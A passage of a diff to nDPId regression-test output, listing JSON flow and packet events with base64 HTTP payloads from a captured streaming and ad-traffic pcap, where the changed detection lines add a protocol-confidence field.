xNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1467353144633,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"ts_msec":1467353144633,"pkt":"ABxCjnAxTF4M6gNlCABFAAFNZb1AADAG6WZ1T1GHwKhzCABQxQsUvd5l87WhOFAYAA4qLgAASFRUUC8xLjEgMzAyIEZvdW5kDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjMzIEdNVA0KQ29udGVudC1MZW5ndGg6IDANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClNldC1Db29raWU6IFY9NjY5Mzg1MTYxNTg4NTA0OTAxMTsgRG9tYWluPW1sdDAxLmNvbTsgRXhwaXJlcz1TYXQsIDAxLUp1bC0yMDE3IDA2OjA1OjM3IEdNVDsgUGF0aD0vDQpMb2NhdGlvbjogaHR0cDovL2NtYy50YW54LmNvbS9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MQ0KDQo="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7440000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00964{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1467353144819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":444,"pkt_l4_len":410,"ts_msec":1467353144819,"pkt":"TF4M6gNlABxCjnAxCABFAAGuBX9AAIAGQAzAqHMIjM3zQMUyAFBCtQhgUXsfllAYQTeurQAAR0VUIC9hbmRjP2FuZGNfdWlkPTY2OTM4NTE2MTU4ODUwNDkwMTEmYW5kY192ZXI9MSBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNClJlZmVyZXI6IGh0dHA6Ly9pbWFnZTEud2Vic2NhY2hlLmNvbS92b2RndWlkZS9pbWFnZXMvdGFvYmFvYWQvdGFvYmFvL3Rhb2Jhby5odG1sDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KQ29va2llOiBjbmE9L2NBSER3UTFtMndDQVhhakNGbzBCbmxmOyBjbmF1aT0xOTgzMTU5NDkzDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiBjbWMudGFueC5jb20NCg0K"}
-00817{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7440000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cmc.tanx.com","url":"cmc.tanx.com\/andc?andc_uid=6693851615885049011&andc_ver=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}}
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1025,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144819,"flow_last_seen":1467353144819,"flow_idle_time":7440000,"flow_min_l4_payload_len":390,"flow_max_l4_payload_len":390,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":390,"midstream":1,"ts_msec":1467353144819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"140.205.243.64","src_port":50482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"cmc.tanx.com","url":"cmc.tanx.com\/andc?andc_uid=6693851615885049011&andc_ver=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"pps.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1467353144913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"ts_msec":1467353144913,"pkt":"ABxCjnAxTF4M6gNlCABFAAENPiNAACwGXAmMzfNAwKhzCABQxTJRex+WQrUJ5lAYFg2SoAAASFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBjbG9zZQ0KU2VydmVyOiBUZW5naW5lDQpUaW1pbmctQWxsb3ctT3JpZ2luOiAqDQoNCjMxDQpHSUY4OWEBAAEAkQAAAAAA\/\/\/\/\/\/\/\/AAAAIfkEAQAAAgAsAAAAAAEAAQAAAgJUAQA7DQowDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7440000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00928{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1467353147705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"ts_msec":1467353147705,"pkt":"TF4M6gNlABxCjnAxCABFAAGTCAFAAIAG5GvAqHMIymwO28UzAFD2bwdscQOwMVAYAQQLYgAAR0VUIC9jb3JlP3Q9MTUwMzI5MSZ0eXBlPXZzJnV1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mYXJlYT1PVkVSU0VBfFRXX0hpTmV0JmZyb209QlNfSGlnaCZ0bz1CU19TdGFuZGFyZCZwbGF5ZXJfc3dpdGNoX2JzX3RpbWU9NDE3MTQmYXZlcmFnZV9kb3dubG9hZF9zcGVlZF89MTU4NTE1LjIwMDAwMCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"}
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7440000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1503291&type=vs&uuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&area=OVERSEA|TW_HiNet&from=BS_High&to=BS_Standard&player_switch_bs_time=41714&average_download_speed_=158515.200000","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1027,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147705,"flow_last_seen":1467353147705,"flow_idle_time":7440000,"flow_min_l4_payload_len":363,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1467353147705,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1503291&type=vs&uuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&area=OVERSEA|TW_HiNet&from=BS_High&to=BS_Standard&player_switch_bs_time=41714&average_download_speed_=158515.200000","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1467353147794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353147794,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FnZAADMGI9HKbA7bwKhzCABQxTNxA7Ax9m8I11AYADa2JwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7440000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01204{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1467353147927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":622,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":622,"pkt_l4_len":588,"ts_msec":1467353147927,"pkt":"TF4M6gNlABxCjnAxCABFAAJgCC5AAIAG43HAqHMIymwO28U0AFClUF0ecJA2DlAYAQSk3gAAR0VUIC9jb3JlP3Q9NSZhPTQmaXNmaW5pc2g9MiZ0bT03JnJhPTImdHJhPTEmcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT02JnI9NTAwNDk0NjAwJmFpZD01MDI5NTk5MDAmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9d2luZG93cyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE0NyZpc2xvY2FsPTAmYXM9ZDE5ZjY0MDQ3YjY0MWNkNmZmMDk2YjA0ZmIyYTMwYjUmdmU9M2NjMGM4ZmEzNzI2MjVlNjQxNDMxNDQ4MTZmM2U5NjgmcGU9Yzk1ZDk5MmUyOTg1NmRjODRmMmU5OTA3YTJlNGIyODImdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="}
-01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7440000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=4&isfinish=2&tm=7&ra=2&tra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353147&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+01141{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1029,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353147927,"flow_last_seen":1467353147927,"flow_idle_time":7440000,"flow_min_l4_payload_len":568,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":568,"midstream":1,"ts_msec":1467353147927,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=4&isfinish=2&tm=7&ra=2&tra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353147&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1467353148016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353148016,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kRtAADMGqSvKbA7bwKhzCABQxTRwkDYOpVBfVlAYADcrXAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1467353150114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"ts_msec":1467353150114,"pkt":"TF4M6gNlABxCjnAxCABFAAOlCc1AAIAG4HzAqHMIymwO7MU1AFBQgbYWJ\/60ElAYQTeIsAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNDkwNDUmc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="}
-01264{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353149045&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
+01290{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353149045&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}}
 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1467353150272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353150272,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5A3BAADMGNsbKbA7swKhzCABQxTUn\/rQSUIG5k1AYACEwggAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAADZC01AAIAGRNfAqHMITeooYMU2AFCms6ewkbp6GVAYAQQ6hQAAUE9TVCAvYmMyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtZW5jDQpVc2VyLUFnZW50OiB7RDY5OTA1NEQtMTY5OS00N0QyLTlCMkItRTk2RjQzOEMxMTYwfQ0KQ29udGVudC1MZW5ndGg6IDU2NzANCkhvc3Q6IGJjdS5mZi5hdmFzdC5jb20NCg0K"}
-00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11":"HTTP Suspicious User-Agent"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bcu.ff.avast.com","url":"bcu.ff.avast.com\/bc2","code":0,"content_type":"","user_agent":"{D699054D-1699-47D2-9B2B-E96F438C1160}"}}
